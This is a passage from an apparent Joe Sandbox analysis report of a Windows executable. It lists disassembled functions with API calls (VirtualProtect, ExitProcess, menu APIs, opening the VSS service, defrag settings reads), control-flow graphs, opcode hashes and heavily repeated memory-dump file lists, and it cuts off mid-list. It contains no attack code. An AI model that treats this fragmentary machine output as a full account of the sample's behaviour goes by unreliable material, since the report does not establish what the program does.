                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 327d7f2858880219fd52e01a241f8b9574452433bf0ddef6575936ced46be9ef
                                                                                                                                                                                                                                                                                    • Instruction ID: ff2e167dc762c1ef8e920f89ec5326e16b0d5a26b6533a079c5e15a382563c2e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 327d7f2858880219fd52e01a241f8b9574452433bf0ddef6575936ced46be9ef
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03217CB2E0A6559BF7108A14CC81AEA7779EFC1301F1550FAE48D97281C67C0FC28F62
                                                                                                                                                                                                                                                                                    Function 0043954B Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 683 43954b-439ca6 call 439c6b VirtualProtect 688 439ca8-439ce6 683->688 689 439cee-439d40 call 439d41 683->689 688->689
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 3660a830192f971279117e6ae1b31de3075d10796fe787bfa7d46bdd70c7ae6f
                                                                                                                                                                                                                                                                                    • Instruction ID: d6f9cc31d815e164e140b0c1c3b9d3e970f95b56d81fc80633346bf053bc2aa1
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3660a830192f971279117e6ae1b31de3075d10796fe787bfa7d46bdd70c7ae6f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 072138B2E055159BF7108601CC81AEAB779EFC5301F2550BAE48DA7280D27C0FC28F52
                                                                                                                                                                                                                                                                                    Function 00451080 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 695 451080-45108a 696 45108c-45169d ExitProcess 695->696 697 45109b-4510ac call 4510bb 695->697
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 7a45616db72f36bb482574550ec85184ff617f4688e83a8a8443402e63f8d230
                                                                                                                                                                                                                                                                                    • Instruction ID: 99dff8696b896045b2b2465c2857d129e321b498c74995c08fbc344012e11459
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a45616db72f36bb482574550ec85184ff617f4688e83a8a8443402e63f8d230
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E11A3B2D051259FF7208A10DC59BEB7BB9EB40310F0100F6E90DAB291D6795EC5CEA2
                                                                                                                                                                                                                                                                                    Function 00450AF0 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 704 450af0-450b1c 706 450b5f-450b80 call 450b81 704->706 707 450b1e-450b5a 704->707 708 45169b-45169d ExitProcess 706->708 707->708
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 2cb4b01da44d9d24d49f68606c85b1348020f140db702c4ba3f941d997588e01
                                                                                                                                                                                                                                                                                    • Instruction ID: e00db402275725e990652d892f8b971178a2964019ba86a459431eb368788478
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cb4b01da44d9d24d49f68606c85b1348020f140db702c4ba3f941d997588e01
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FF0F6C2C159009EF3184254ECABBBB3518DB90326F1842BFEA4B044C6A56C3FC94567
                                                                                                                                                                                                                                                                                    Function 00450F77 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 0045169D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ca43295c0aac3e00c918bb2de0f96e5e46867974d37685d0bbd9cf70bccf2336
                                                                                                                                                                                                                                                                                    • Instruction ID: f968807da2bbe673111a2d6e16995004d545fd51fd9e77028d14e4298e1144a3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca43295c0aac3e00c918bb2de0f96e5e46867974d37685d0bbd9cf70bccf2336
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27C012F14003045AF7008A60EC8ABAA7628D700351F148071ED0D54181862D4E964913

                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                    Function 0041FAB0 Relevance: 47.5, APIs: 7, Strings: 20, Instructions: 275windowCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000000,00000001), ref: 0041FAF6
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000001,00000001,?), ref: 0041FB49
                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000002,00000001,?), ref: 0041FB9C
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000000), ref: 0041FBC3
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000001), ref: 0041FD14
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(?,00000000), ref: 0041FD7A
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000000,00000002), ref: 0041FE06
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$InfoItem
                                                                                                                                                                                                                                                                                    • String ID: $0$3401008$3401009$3401010$3401011$3401012$3401013$3401014$3401015$3401016$3401017$3401018$3401019$3401020$3401021$3401022$3401024$3401098$3401131
                                                                                                                                                                                                                                                                                    • API String ID: 1040333723-179025603
                                                                                                                                                                                                                                                                                    • Opcode ID: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                    • Instruction ID: 83c1616b1d25a5f5e88f9c25e0e2a21432fc20987b46dd7eda8cdac89d290607
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57bab4f1923334ec470cd56f5efcc3a9a6a283e0eb4f594bc954c30004842149
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7811FF0FA031036E794AAA59C53FEB31686F44B44F20C81F760EB25D5C9ACA84556ED
                                                                                                                                                                                                                                                                                    Function 0041B4B0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 135serviceCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,20000000,?,00000000,?,?,00427EC2,113262B6), ref: 0041B4C2
                                                                                                                                                                                                                                                                                    • OpenServiceW.ADVAPI32(00000000,VSS,00000034,?,?,00000000,?,?,00427EC2,113262B6), ref: 0041B4DD
                                                                                                                                                                                                                                                                                    • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00427EC2,113262B6), ref: 0041B4EA
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370641021.0000000000548000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370671207.0000000000551000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370707627.0000000000554000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370757620.000000000055A000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370794730.000000000055D000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370823398.0000000000565000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370852532.000000000056A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370892084.0000000000599000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370918780.000000000059C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: OpenService$CloseHandleManager
                                                                                                                                                                                                                                                                                    • String ID: VSS
                                                                                                                                                                                                                                                                                    • API String ID: 4136619037-4102325705
                                                                                                                                                                                                                                                                                    • Opcode ID: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                    • Instruction ID: e3fabb29cb39525be17c5613465a7dd84fffe719b6809a75a20e2f83d6b45fa7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a669f043333560b65fa7305655f79df43c8048374914dc36b6d5132fd2da2c07
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6631E932601314A7D610EBA8AC80FFB775DEB45365F84083FF904D2251DB19E98987EA
                                                                                                                                                                                                                                                                                    Function 00411150 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242fileCOMMON
                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,00000000,0000024C), ref: 004112A2
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefragTime,0047D9D0,?,00000064,?), ref: 0041134A
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,TotalDefraggedFileSize,0047EF74,?,00000064,?), ref: 004113FA
                                                                                                                                                                                                                                                                                    • StrFormatByteSizeW.SHLWAPI(00000000), ref: 0041141C
                                                                                                                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(main,DefraggedFileCount,0047EF74,?,00000064,?), ref: 00411452
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 00411474
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00411483
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370134017.0000000000400000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370346327.0000000000496000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370386626.0000000000497000.00000008.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370423913.0000000000499000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000001A.00000002.2370598373.0000000000545000.00000080.00000001.01000000.00000014.sdmpDownload File
